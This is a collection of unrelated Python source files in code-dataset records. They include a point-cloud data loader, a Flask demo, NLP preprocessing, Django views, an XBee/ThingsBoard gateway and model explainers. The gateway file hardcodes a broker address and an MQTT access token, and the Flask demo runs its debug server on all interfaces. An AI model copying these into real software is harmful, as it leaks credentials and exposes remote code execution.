time.time()\n cloud_name = file_path.stem\n if self.val_split in cloud_name:\n cloud_split = 'validation'\n else:\n cloud_split = 'training'\n\n # Name of the input files\n kd_tree_file = self.path / '{:s}_KDTree.pkl'.format(cloud_name)\n sub_npy_file = self.path / '{:s}.npy'.format(cloud_name)\n\n data = np.load(sub_npy_file, mmap_mode='r').T\n\n sub_colors = data[:,3:6]\n sub_labels = data[:,-1].copy()\n\n # Read pkl with search tree\n with open(kd_tree_file, 'rb') as f:\n search_tree = pickle.load(f)\n\n # The points information is in tree.data\n self.input_trees[cloud_split].append(search_tree)\n self.input_colors[cloud_split].append(sub_colors)\n self.input_labels[cloud_split].append(sub_labels)\n self.input_names[cloud_split].append(cloud_name)\n\n size = sub_colors.shape[0] * 4 * 7\n print('{:s} {:.1f} MB loaded in {:.1f}s'.format(kd_tree_file.name, size * 1e-6, time.time() - t0))\n\n 
print('\\nPreparing reprojected indices for testing')\n\n # Get validation and test reprojected indices\n\n for i, file_path in enumerate(self.paths):\n t0 = time.time()\n cloud_name = file_path.stem\n\n # Validation projection and labels\n if self.val_split in cloud_name:\n proj_file = self.path / '{:s}_proj.pkl'.format(cloud_name)\n with open(proj_file, 'rb') as f:\n proj_idx, labels = pickle.load(f)\n\n self.val_proj += [proj_idx]\n self.val_labels += [labels]\n print('{:s} done in {:.1f}s'.format(cloud_name, time.time() - t0))\n\n def __getitem__(self, idx):\n pass\n\n def __len__(self):\n # Number of clouds\n return self.size\n\n\nclass ActiveLearningSampler(IterableDataset):\n\n def __init__(self, dataset, batch_size=6, split='training'):\n self.dataset = dataset\n self.split = split\n self.batch_size = batch_size\n self.possibility = {}\n self.min_possibility = {}\n\n if split == 'training':\n self.n_samples = cfg.train_steps\n else:\n self.n_samples = cfg.val_steps\n\n #Random initialisation for weights\n self.possibility[split] = []\n self.min_possibility[split] = []\n for i, tree in enumerate(self.dataset.input_colors[split]):\n self.possibility[split] += [np.random.rand(tree.data.shape[0]) * 1e-3]\n self.min_possibility[split] += [float(np.min(self.possibility[split][-1]))]\n\n def __iter__(self):\n return self.spatially_regular_gen()\n\n def __len__(self):\n return self.n_samples # not equal to the actual size of the dataset, but enable nice progress bars\n\n def spatially_regular_gen(self):\n # Choosing the least known point as center of a new cloud each time.\n\n for i in range(self.n_samples * self.batch_size): # num_per_epoch\n # t0 = time.time()\n if cfg.sampling_type=='active_learning':\n # Generator loop\n\n # Choose a random cloud\n cloud_idx = int(np.argmin(self.min_possibility[self.split]))\n\n # choose the point with the minimum of possibility as query point\n point_ind = np.argmin(self.possibility[self.split][cloud_idx])\n\n # Get points from tree structure\n points = np.array(self.dataset.input_trees[self.split][cloud_idx].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n noise = np.random.normal(scale=3.5 / 10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n\n if len(points) < cfg.num_points:\n queried_idx = self.dataset.input_trees[self.split][cloud_idx].query(pick_point, k=len(points))[1][0]\n else:\n queried_idx = self.dataset.input_trees[self.split][cloud_idx].query(pick_point, k=cfg.num_points)[1][0]\n\n queried_idx = DP.shuffle_idx(queried_idx)\n # Collect points and colors\n queried_pc_xyz = points[queried_idx]\n queried_pc_xyz = queried_pc_xyz - pick_point\n queried_pc_colors = self.dataset.input_colors[self.split][cloud_idx][queried_idx]\n queried_pc_labels = self.dataset.input_labels[self.split][cloud_idx][queried_idx]\n\n dists = np.sum(np.square((points[queried_idx] - pick_point).astype(np.float32)), axis=1)\n delta = np.square(1 - dists / np.max(dists))\n self.possibility[self.split][cloud_idx][queried_idx] += delta\n self.min_possibility[self.split][cloud_idx] = float(np.min(self.possibility[self.split][cloud_idx]))\n\n if len(points) < cfg.num_points:\n queried_pc_xyz, queried_pc_colors, queried_idx, queried_pc_labels = \\\n DP.data_aug(queried_pc_xyz, queried_pc_colors, queried_pc_labels, queried_idx, cfg.num_points)\n\n # Simple random choice of cloud and points in it\n elif cfg.sampling_type=='random':\n\n 
cloud_idx = np.random.choice(len(self.min_possibility[self.split]), 1)[0]\n points = np.array(self.dataset.input_trees[self.split][cloud_idx].data, copy=False)\n queried_idx = np.random.choice(len(self.dataset.input_trees[self.split][cloud_idx].data), cfg.num_points)\n queried_pc_xyz = points[queried_idx]\n queried_pc_colors = self.dataset.input_colors[self.split][cloud_idx][queried_idx]\n queried_pc_labels = self.dataset.input_labels[self.split][cloud_idx][queried_idx]\n\n queried_pc_xyz = torch.from_numpy(queried_pc_xyz).float()\n queried_pc_colors = torch.from_numpy(queried_pc_colors).float()\n queried_pc_labels = torch.from_numpy(queried_pc_labels).long()\n queried_idx = torch.from_numpy(queried_idx).float() # keep float here?\n cloud_idx = torch.from_numpy(np.array([cloud_idx], dtype=np.int32)).float()\n\n points = torch.cat( (queried_pc_xyz, queried_pc_colors), 1)\n\n yield points, queried_pc_labels\n\n\ndef data_loaders(dir, sampling_method='active_learning', **kwargs):\n if sampling_method == 'active_learning':\n dataset = CloudsDataset(dir / 'train')\n batch_size = kwargs.get('batch_size', 6)\n val_sampler = ActiveLearningSampler(\n dataset,\n batch_size=batch_size,\n split='validation'\n )\n train_sampler = ActiveLearningSampler(\n dataset,\n batch_size=batch_size,\n split='training'\n )\n return DataLoader(train_sampler, **kwargs), DataLoader(val_sampler, **kwargs)\n\n if sampling_method == 'naive':\n train_dataset = PointCloudsDataset(dir / 'train')\n val_dataset = PointCloudsDataset(dir / 'val')\n return DataLoader(train_dataset, shuffle=True, **kwargs), DataLoader(val_dataset, **kwargs)\n\n raise ValueError(f\"Dataset sampling method '{sampling_method}' does not exist.\")\n\nif __name__ == '__main__':\n dataset = CloudsDataset('datasets/s3dis/subsampled/train')\n batch_sampler = ActiveLearningSampler(dataset)\n for data in batch_sampler:\n xyz, colors, labels, idx, cloud_idx = data\n print('Number of points:', len(xyz))\n print('Point position:', xyz[1])\n print('Color:', colors[1])\n print('Label:', labels[1])\n print('Index of point:', idx[1])\n print('Cloud index:', cloud_idx)\n break\n","repo_name":"aRI0U/RandLA-Net-pytorch","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"78"} +{"seq_id":"72109390973","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\n\napp = Flask(__name__, static_url_path='', static_folder='')\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/test')\ndef test():\n ls =[1,2,3,4]\n return str(ls)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=80)\n\n# http://127.0.0.1","repo_name":"cxinping/PythonFullStack","sub_path":"Chapter08/flask_demo1/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"73742360573","text":"#TPP tryout V0.1 - 30 AUG\n\n#checking numbers of entries\nrawCSV = open('text.csv').read()\nsplitCSV = rawCSV.split('\"\\n\"')\nprint(len(splitCSV))\n\n\n\n#DATAFRAME\nimport pandas as pd\npd.set_option('display.max_colwidth', 100)\n\ndata = pd.read_csv('text.csv')\ndata.columns = ['text']\nprint(data.head())\n\n\n\n#REMOVE PUNCTUATION\nimport string\n\ndef remove_punct(text):\n text_nopunct = \"\".join([char for char in text if char not in string.punctuation])\n return text_nopunct\n\ndata['text_clean'] = 
data['text'].apply(lambda x: remove_punct(x))\nprint(data.head())\n\n\n\n#TOKENISE\nimport re\n\ndef tokenise(text):\n tokens = re.split('\\W+', text)\n return tokens\n\ndata['text_token'] = data['text_clean'].apply(lambda x: tokenise(x.lower()))\nprint(data.head())\n\n\n\n#REMOVE STOPWORDS\n# import requests\n# stopwords_list = requests.get(\"https://gist.githubusercontent.com/rg089/35e00abf8941d72d419224cfd5b5925d/raw/12d899b70156fd0041fa9778d657330b024b959c/stopwords.txt\").content\n# stopwords = set(stopwords_list.decode().splitlines()) \n\nfrom nltk.corpus import stopwords\nstopword = stopwords.words('english')\n\ndef remove_stopwords(tokenised_list):\n text = [word for word in tokenised_list if word not in stopword]\n return text\n\ndata['text_nostop'] = data['text_token'].apply(lambda x: remove_stopwords(x))\nprint(data.head())\n\n\n\n#STEMMING VS LEMMATIZING\nimport nltk\n\nps = nltk.PorterStemmer()\nwn = nltk.WordNetLemmatizer()\n\ndef stemming(tokenized_text):\n text_stemming = [ps.stem(word) for word in tokenized_text]\n return text_stemming\n\ndata['text_stemmed'] = data['text_nostop'].apply(lambda x: stemming(x))\n\ndef lemmatizing(tokenized_text):\n text_lemmatizing = [wn.lemmatize(word) for word in tokenized_text]\n return text_lemmatizing\n\ndata['text_lemmatized'] = data['text_nostop'].apply(lambda x: lemmatizing(x))\n\ndata.head()\n\n\n\n#Output a csv file\ndf = pd.DataFrame(data)\ndf.to_csv('texted.csv')","repo_name":"laiyeowming/PTT","sub_path":"tpp.py","file_name":"tpp.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26992981963","text":"import asyncio\nfrom concurrent.futures import ThreadPoolExecutor\nimport threading\n\nfrom ..carol import _retry_session\nfrom .miscellaneous import stream_data\n\n\nclass AtomicCounter:\n \"\"\"An atomic, thread-safe incrementing counter.\n\n Args:\n initial: `int` default `0`\n Initial value for the counter.\n total: `int` default `None`\n If exists, the max value that will be reached.\n\n \"\"\"\n\n def __init__(self, initial=0, total=None):\n \"\"\"Initialize a new atomic counter to given initial value.\n \"\"\"\n self.value = initial\n self.total = total\n self._lock = threading.Lock()\n\n def increment(self, num=1):\n \"\"\"Atomically increment the counter by num (default 1) and return the\n new value.\n \"\"\"\n with self._lock:\n self.value += num\n return self.value\n\n def print(self):\n # Guarantee to print only one thread each time.\n with self._lock:\n print(f'{self.value}/{self.total} sent', end='\\r')\n\n\ndef send_a(carol, session, url, data_json, extra_headers, content_type, counter):\n \"\"\"\n Helper function to be used when sending data async.\n\n Args:\n carol: requests.Session\n Carol object\n session: `requests.Session`\n Session object to handle multiple API calls.\n url: `str`\n end point to be called.\n data_json: `dict`\n The json to be send.\n extra_headers: `dict`\n Extra headers to be used in the API call\n content_type: `dict`\n Content type of the call.\n :return: None\n \"\"\"\n carol.call_api(url, data=data_json, extra_headers=extra_headers,\n content_type=content_type, session=session)\n\n counter.increment(len(data_json))\n counter.print()\n\n\nasync def send_data_asynchronous(carol, data, step_size, url, extra_headers,\n content_type, max_workers, compress_gzip):\n \"\"\"\n Helper function to send data asynchronous.\n\n Args:\n carol: `pycarol.carol.Carol`.\n Carol object\n data: 
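The tpp.py record above runs both a Porter stemmer and a WordNet lemmatizer over the same tokens; the difference between the two is easiest to see on a few concrete words. A small check (assumes the NLTK wordnet corpus is installed, e.g. via nltk.download('wordnet')):

import nltk

ps = nltk.PorterStemmer()
wn = nltk.WordNetLemmatizer()

for word in ["studies", "running", "flies"]:
    # the stemmer chops suffixes ('studies' -> 'studi'); the lemmatizer
    # maps to a dictionary form ('studies' -> 'study')
    print(word, ps.stem(word), wn.lemmatize(word))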
`pandas.DataFrame` or `list of dict`,\n Data to be sent.\n step_size: 'int'\n Number of records per slice.\n url: 'str'\n API URI\n extra_headers: `dict`\n Extra headers to be used in the API call\n content_type: `dict`\n Content type of the call.\n max_workers: `int`\n Max number of workers of the async job\n compress_gzip: 'bool'\n If to compress the data to send\n :return:\n \"\"\"\n\n counter = AtomicCounter(total=len(data))\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n session = _retry_session(status_forcelist=[502, 429, 524, 408, 504, 598, 520, 503, 500],\n method_whitelist=frozenset(['POST']))\n # Set any session parameters here before calling `send_a`\n loop = asyncio.get_event_loop()\n tasks = [\n loop.run_in_executor(\n executor,\n send_a,\n *(carol, session, url, data_json, extra_headers, content_type, counter)\n # Allows us to pass in multiple arguments to `send_a`\n )\n for data_json, _ in stream_data(data=data,\n step_size=step_size,\n compress_gzip=compress_gzip)\n ]\n\n for _ in await asyncio.gather(*tasks):\n pass\n","repo_name":"totvslabs/pyCarol","sub_path":"pycarol/utils/async_helpers.py","file_name":"async_helpers.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"37587264382","text":"x = int(input())\ny = int(input())\nboard = []\nfor i in range(y):\n board.append(input())\n\ndoor_count = 0\n#do not check top left or bottom left (both are corners)\nfor i in range(1, y-1):\n #check left side\n if board[i][1] != \"F\":\n door_count += 1\n #check right side\n if board[i][x-2] != \"F\":\n door_count += 1\n#do not check top right or bottom right (both are corners)\nfor i in range(1, x-1):\n #check top side\n if board[1][i] != \"F\":\n door_count += 1\n #check bottom side\n if board[-2][i] != \"F\":\n door_count += 1\n\nprint(door_count)","repo_name":"justinba1010/USCCodeathon-S21-Lower","sub_path":"doorPlacement/solutions/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71925390012","text":"from django.shortcuts import render_to_response\nfrom models import Proyecto, Usuario, Curso, Alumno\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom forms import CursoForm, UsuarioForm, AlumnoForm, ProyectoForm\n\ndef listadoAlumnos(request, rol):\n listaProyectos= Proyecto.objects.all()\n \n if (rol==\"tutor\"):\n titulo = \"Alumnes Assignats\"\n elif (rol==\"coordinador\"):\n titulo = \"Gestio d'Alumnes\"\n elif (rol==\"coordinador-tutor\"):\n rol = [\"coordinador\", \"tutor\"]\n titulo = \"Alumnes de Xxxxxx Yyyyyyy Zzzzzzz\"\n \n return render_to_response('listadoAlumnos.html', {'listaProyectos': listaProyectos, 'rol': rol, 'titulo': titulo})\n\ndef listadoProfesores(request):\n listaCoordinadores = Usuario.objects.filter(rol=\"C\")\n listaTutores = Usuario.objects.filter(rol=\"T\")\n listaProfesores = Usuario.objects.filter(rol=\"P\")\n return render_to_response('listadoProfesores.html', {'listaCoordinadores': listaCoordinadores, 'listaTutores': listaTutores, 'listaProfesores': listaProfesores})\n\ndef listadoCursos(request):\n listaCursos = Curso.objects.all().order_by(\"-id\")\n return render_to_response('Cursos.html', {'listaCursos': listaCursos})\n\ndef nuevoCurso(request):\n if (request.method == \"POST\"):\n form = CursoForm(request.POST)\n if (form.is_valid()):\n listaTutores = 
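send_data_asynchronous in the pyCarol record above fans blocking HTTP calls out over a thread pool from inside an event loop, with a lock-guarded counter reporting progress. A sketch of the shape of that pattern, stripped of the Carol specifics; send_chunk here is a stand-in for the blocking carol.call_api call:

import asyncio
import threading
import time
from concurrent.futures import ThreadPoolExecutor

lock = threading.Lock()
sent = 0

def send_chunk(chunk):
    global sent
    time.sleep(0.01)                 # pretend this is a blocking HTTP POST
    with lock:                       # same job as AtomicCounter above
        sent += len(chunk)

async def send_all(chunks, max_workers=4):
    loop = asyncio.get_running_loop()
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        await asyncio.gather(
            *(loop.run_in_executor(pool, send_chunk, c) for c in chunks))

asyncio.run(send_all([[1, 2], [3], [4, 5, 6]]))
print(sent)                          # 6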
Usuario.objects.filter(rol=\"T\")\n for tutor in listaTutores:\n tutor.rol=\"P\"\n tutor.save()\n curso_nuevo = Curso(curso = form.cleaned_data['curso'])\n curso_nuevo.save()\n \n return HttpResponseRedirect('/coordinacio/cursos')\n else:\n form = CursoForm()\n curso_actual = int(Curso.objects.order_by(\"-id\")[0].curso.split(\"/\")[0])\n \n form.initial[\"curso\"] = str(curso_actual+1)+\"/\"+str(curso_actual+2)\n return render_to_response('CursoNuevo.html', {'form': form})\n\ndef nuevoProfesor(request):\n form = UsuarioForm()\n return render_to_response('ProfesorNuevo.html', {'form': form})\n\ndef nuevoAlumno(request):\n if (request.method == \"POST\") :\n form_alumno = AlumnoForm(request.POST, prefix='alumno')\n form_proyecto = ProyectoForm(request.POST, prefix='proyecto')\n if (form_alumno.is_valid() and form_proyecto.is_valid()):\n alumno = Alumno(form_alumno)\n alumno.save()\n curso = Curso.objects.order_by(\"-id\")[0]\n proyecto = Proyecto(form_proyecto, alumno=alumno, curso=curso)\n proyecto.save()\n return HttpResponseRedirect('/coordinacio/cursos')\n else: \n form_alumno = AlumnoForm(prefix='alumno')\n form_proyecto = ProyectoForm(prefix='proyecto')\n return render_to_response('AlumnoNuevo.html', {'form_alumno': form_alumno, 'form_proyecto': form_proyecto})\n\n## BORRAR funcion y plantillas html \ndef contact(request):\n if (request.method == \"POST\" ):\n form = ContactForm(request.POST)\n if (form.is_valid()):\n tema = form.cleaned_data['tema']\n mensaje = form.cleaned_data['mensaje']\n email = form.cleaned_data.get('sender', 'landreup@gmail.com')\n return render_to_response('contact_view.html', {'tema': tema, 'mensaje': mensaje, 'email': email})\n else: \n form = ContactForm()\n return render_to_response('contact.html', {'form': form})","repo_name":"landreup/EvaluaCompleto","sub_path":"evalua/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"43643985120","text":"count=0\nclass Elevator:\n def __init__(self, bottom, top, current):\n \"\"\"Initializes the Elevator instance.\"\"\"\n self.bottom = bottom\n self.top = top\n self.current = current\n pass\n def __str__(self):\n return \"Current floor: {}\".format(self.current)\n def up(self):\n \"\"\"Makes the elevator go up one floor.\"\"\"\n if self.current < 10:\n self.current +=1\n else:\n print(\"No such floor\")\n def down(self):\n \"\"\"Makes the elevator go down one floor.\"\"\"\n if self.current > 0:\n self.current -=1\n else:\n print(\"No such floor\")\n def go_to(self, floor):\n \"\"\"Makes the elevator go to the specific floor.\"\"\"\n global count\n count=0\n while True:\n if self.current == floor:\n print(\"Floor reached\")\n break\n elif floor < self.current:\n self.down()\n count=count-1\n elif floor > self.current:\n self.up()\n count=count+1\nelevator = Elevator(-1, 10, 0)\nwhile True:\n tf=int(input(\"Enter the required floor: \"))\n print(elevator.current)\n elevator.go_to(tf)\n print(\"Elevator movement: \",count)\n \n","repo_name":"Psri-01/PyPrac","sub_path":"elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23516955830","text":"#This is my attempt at a complete gateway progtam serving as an interface between the thingsboard.io based user interface and the xbee based turbine network.\n\nimport serial #for connecting to local xbee through 
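nuevoAlumno in the Django views record above passes a bound form straight to the model constructor (Alumno(form_alumno)), which binds the form object to the model's first positional field instead of saving its data; models want keyword arguments taken from form.cleaned_data. A hedged sketch of the corrected save step against the record's own models and forms, assuming the form field names match the model fields (otherwise a ModelForm with form.save() is the usual route):

def nuevoAlumno(request):
    if request.method == "POST":
        form_alumno = AlumnoForm(request.POST, prefix='alumno')
        form_proyecto = ProyectoForm(request.POST, prefix='proyecto')
        if form_alumno.is_valid() and form_proyecto.is_valid():
            # unpack the validated fields rather than passing the form itself
            alumno = Alumno(**form_alumno.cleaned_data)
            alumno.save()
            curso = Curso.objects.order_by("-id")[0]
            proyecto = Proyecto(**form_proyecto.cleaned_data,
                                alumno=alumno, curso=curso)
            proyecto.save()
            return HttpResponseRedirect('/coordinacio/cursos')
    else:
        form_alumno = AlumnoForm(prefix='alumno')
        form_proyecto = ProyectoForm(prefix='proyecto')
    return render_to_response('AlumnoNuevo.html',
                              {'form_alumno': form_alumno,
                               'form_proyecto': form_proyecto})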
serial port\nfrom digi.xbee.devices import XBeeDevice, RemoteXBeeDevice, XBee64BitAddress #for interacting with xbee network\nimport paho.mqtt.client as mqtt #for interacting with thingsboard.io through mqtt messaging protocol\nimport json #makes converting between json libraries and strings easier. This helps processing mqtt messages.\nimport time #Is this still needed?\nimport threading #is this still needed?\nimport csv #Allows us to read in comma seperated value (csv) data files. Used to read inputFile.txt\n\n\n###################################################################################\n### Part 1: MQTT stuff\n###################################################################################\nmqttBroker = \"192.155.83.191\" #This is the instance of thingsboard that we installed on ???\nmqttClientId = \"ewanderson\" #This can be anything, but you have to pick a unique Id so thingsboard can keep track of what messages it has already sent you.\nmqttUserName = \"EoF9kjhJz0ESHHnTJmsD\" #this is the access token for the thingsboard gateway device\n\ntopicAttr = \"v1/gateway/attributes\" #This is the topic for sending attributes through a gateway in thingsboard \ntopicGtwyAttr = 'v1/devices/me/attributes'\ntopicTelem = \"v1/gateway/telemetry\" #This is the topic for sending telemetry through a gateway in thingsboard \ntopicConnect = \"v1/gateway/connect\"\n\n# The callback for when we recieve a CONNACK response from the MQTT server.\ndef on_connect(MQTT, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc)) #result code 0 means sucessfuly connected\n MQTT.subscribe(\"v1/devices/me/rpc/request/+\") #Subscribing to receive RPC requests\n MQTT.subscribe(\"v1/devices/me/attributes/response/+\") #subscribe to receive answers when we request attributes from the MQTT server\n\n# The callback when we receive a message from the MQTT server.\ndef on_message(client, userdata, msg):\n\tglobal MQTT_message, new_MQTT_message\n\tprint('Topic: ',msg.topic,'\\nMessage: ',str(msg.payload))\n\tMQTT_message = msg\n\tnew_MQTT_message = True \n\t\n#This reads the turbine parameter input file inputFile.txt and formats the data in the necessary libraries that will be used by other parts of this program.\ndef readTurbineInputFile(): \n\taddr2name = {}\n\tname2addr = {}\n\twith open('inputFile.txt') as f : #read input file and store data in the list turbArrayProps\n\t\treader = csv.reader(f, delimiter=\"\\t\")\n\t\tturbArrayProps = list(reader)\n\tfor i in range(1, len(turbArrayProps)): #process each row in input file\n\t\tname = turbArrayProps[i][0]\n\t\taddress = '0013a200'+turbArrayProps[i][1]\n\t\tlatitude = turbArrayProps[i][2]\n\t\tlongitude = turbArrayProps[i][3]\n\t\taddr2name[address] = name #to find a turbine name from the remote XBee address\n\t\tname2addr[name] = address #The reverse of the previous dictionary. Used to find the remote XBee address from a turbine name\n\t\tMQTT.publish(topicConnect, json.dumps({'device':name})) #Tell thingsboard that this turbine is connected\n\t\tMQTT.publish(topicAttr,json.dumps({name:{'latitude':latitude,'longitude':longitude}})) #Tell thingsboard the position of this turbine\n\treturn addr2name, name2addr\n\n#This is called once when the program starts. 
It processes a message from thingsboard containing several attribute values required by other parts of this program.\ndef attribute_message(data): \n global safety_switch, turbineOnOff_switch\n print('recieved current switch status from Thingsboard')\n data = data.get('client')\n safety_switch = data.get('safety_switch')\n turbineOnOff_switch = data.get('turbineOnOff_switch')\n \n\n","repo_name":"ewandersonUCDavis/XBee_Python","sub_path":"python3/gateway.py","file_name":"gateway.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31625514224","text":"from pdpbox import pdp\nfrom matplotlib import pyplot as plt\n\nimport eli5\nfrom eli5.sklearn import PermutationImportance\n\nimport warnings\n\nimport pandas as pd\nimport numpy as np\nimport shap\n\nfrom abc import ABC, abstractmethod\n\nimport itertools\n\nclass BaseExplainer(ABC):\n \"\"\"\n Базовый класс для интерпретатора.\n \"\"\"\n\n @abstractmethod\n def fit(self):\n \"\"\"\n Применение вычислительной функции к данным\n :returns: Интерпретатор с расчитанными значениями анализаторов\n \"\"\"\n pass\n\n @abstractmethod\n def to_disc(self, path: str):\n \"\"\"\n Сериализация модели отбора признаков на диск\n \"\"\"\n pass\n\n @classmethod\n @abstractmethod\n def from_disc(cls, path: str):\n \"\"\"\n Чтение модели отбора признаков с диска\n \"\"\"\n pass\n\nclass PdExplainer(BaseExplainer):\n \"\"\"Класс PdExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью Partial Dependence.\n\n Note:\n Класс использует библиотеку PDP-Box(https://github.com/SauceCat/PDPbox). \n Наиболее простая установка через conda-forge(https://github.com/conda-forge/pdpbox-feedstock).\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n model_features : list\n список признаков(названий колонок) \n features : list\n список признаков(названий колонок) для которых будет вычисляться PartialDependence\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n model_features: list,\n features: list):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n model_features: список признаков(названий колонок)\n features: список признаков(названий колонок) для которых будет вычисляться PartialDependence\n \"\"\"\n self.model = model\n self.X = x\n self.model_features = model_features\n self.features=features\n\n def fit(self,fit_pairs=False) -> None:\n \"\"\"\n Метод вычисляет значения параметров, которые используются для интерпретации Partial Dependence.\n :param fit_pairs: По умолчанию False. 
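The gateway record above speaks to ThingsBoard over three fixed MQTT topics: v1/gateway/connect to announce a device, v1/gateway/attributes for metadata, and v1/gateway/telemetry for timestamped values. A minimal sketch of that handshake with paho-mqtt; the broker address, access token, and device name are placeholders, and the telemetry payload shape follows the ThingsBoard gateway API as I recall it:

import json
import paho.mqtt.client as mqtt

client = mqtt.Client("example-gateway")               # any unique client id
client.username_pw_set("ACCESS_TOKEN")                # the gateway device's token
client.connect("thingsboard.example.com", 1883, 60)   # placeholder broker
client.loop_start()

# a gateway must announce a device before publishing on its behalf
client.publish("v1/gateway/connect", json.dumps({"device": "turbine-01"}))
client.publish("v1/gateway/attributes",
               json.dumps({"turbine-01": {"latitude": 38.5, "longitude": -121.7}}))
client.publish("v1/gateway/telemetry",
               json.dumps({"turbine-01": [{"ts": 1700000000000,
                                           "values": {"rpm": 42}}]}))
client.loop_stop()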
Если True, то PartialDependence будет расчитан не только для признаков в отдельности, но и для пар признаков.\n :return: Интерпретатор с расчитанными параметрами PartialDependence.\n \"\"\"\n features = self.features\n pdp_feat_list=[]\n\n for feat in features:\n pdp_feat = pdp.pdp_isolate(model=self.model, dataset=self.X, model_features=self.model_features, feature=feat)\n pdp_feat_list.append(pdp_feat)\n \n self.pdp_feat = dict(zip(features, pdp_feat_list)) \n print('Fitted features:')\n print(list(self.pdp_feat.keys()))\n\n if (len(self.features)>=2) & (fit_pairs==True):\n\n pdp_intr_list=[]\n features_pairs = list(itertools.combinations(features, 2))\n\n for pair in features_pairs:\n pdp_intr = pdp.pdp_interact(model=self.model, dataset=self.X, model_features=self.model_features, features=pair)\n pdp_intr_list.append(pdp_intr)\n \n self.pdp_intr = dict(zip(features_pairs, pdp_intr_list)) \n print('Fitted pairs:')\n print(str(list(self.pdp_intr.keys()))) \n\n\n def plot_pdp(self, feature_name: str) -> None:\n \"\"\"\n Метод строит PDP для одного признака.\n :param feature_name: название признака(колонки)\n \"\"\"\n isolate_output = self.pdp_feat.get(feature_name)\n fig, axes = pdp.pdp_plot(isolate_output,feature_name)\n\n return fig, axes\n \n def plot_pdp_pair(self,pair_name: tuple) -> None:\n \"\"\"\n Метод строит PDP для пары признаков.\n :param pair_name: кортеж из двух названий признаков(колонок)\n \"\"\"\n interact_output = self.pdp_intr.get(pair_name)\n fig, axes = pdp.pdp_interact_plot(interact_output,pair_name)\n\n return fig, axes \n \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'PdExplainer':\n explainer = joblib.load(path)\n return explainer\n\n\nclass ShapExplainer(BaseExplainer):\n \"\"\"Класс ShapExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью SHAPley values.\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n ):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n \"\"\"\n self.model = model \n self.X = x\n \n def fit(self):\n \"\"\"\n Метод вычисляет значения SHAP, которые используются для интерпретации SHAP.\n \"\"\"\n shap.initjs()\n model_explainer = shap.KernelExplainer(self.model.predict, shap.kmeans(self.X,10).data)\n \n shap_values = model_explainer.shap_values(self.X)\n expected_value = model_explainer.expected_value\n \n self.shap_values = shap_values\n self.expected_value = expected_value \n\n def plot_shap_summary(self):\n \"\"\"\n Метод строит график SHAP summary.\n \"\"\"\n ax = shap.summary_plot(self.shap_values, self.X,feature_names=self.X.columns.to_list())\n return ax\n\n def plot_shap_importance(self):\n \"\"\"\n Метод строит график SHAP importance.\n \"\"\"\n ax = shap.summary_plot(self.shap_values, self.X, feature_names=self.X.columns.to_list(),plot_type=\"bar\")\n return ax \n\n def plot_shap_dependence(self,feature: str):\n \"\"\"\n Метод строит график SHAP dependence для выбранного признака(колонки).\n :param feature: название признака(колонки) для которой будет построен график\n \"\"\"\n ax = shap.dependence_plot(feature, self.shap_values, self.X)\n return ax \n\n def plot_shap_force(self,idx):\n \"\"\"\n Метод строит график SHAP force для выбранного наблюдения из датасета.\n 
